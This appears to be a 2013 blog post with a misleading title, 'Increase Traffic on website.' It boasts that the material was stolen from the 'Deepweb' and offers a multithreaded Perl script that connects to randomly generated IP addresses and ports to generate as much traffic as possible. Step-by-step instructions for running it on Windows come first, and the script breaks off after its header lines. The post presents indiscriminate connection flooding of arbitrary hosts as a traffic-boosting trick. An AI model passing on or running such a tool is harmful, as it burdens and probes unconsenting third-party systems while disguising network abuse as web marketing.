
Showing posts from September, 2013

Increase Traffic on website.

HOW TO INCREASE TRAFFIC _______________This Post Has been Stolen From Deepweb________________ This Perl script creates random IP numbers and ports and tries to connect to these IPs aiming to generate as much traffic as possible. Procedure: Remember for this you have to download and install Active Perl> After downloading and installation copy the below code  Paste it in Notepad and save it in ur C: drive. anything means any name Open cmd and type this cd\ (hit enter) Then Type this and hit enter C: Then type this line In your case it will be somthing else depending upon which name have u given to that file. _______________________________ REMEMBER THIS: DON'T USE THIS SCRIPT IF YOU DON'T HAVE LOTS OF BANDWIDTH _____________Copy the below code__________________ #!/usr/bin/perl -Tw package multithreadediptraverse; use strict; use threads; use threads::shared; use Thre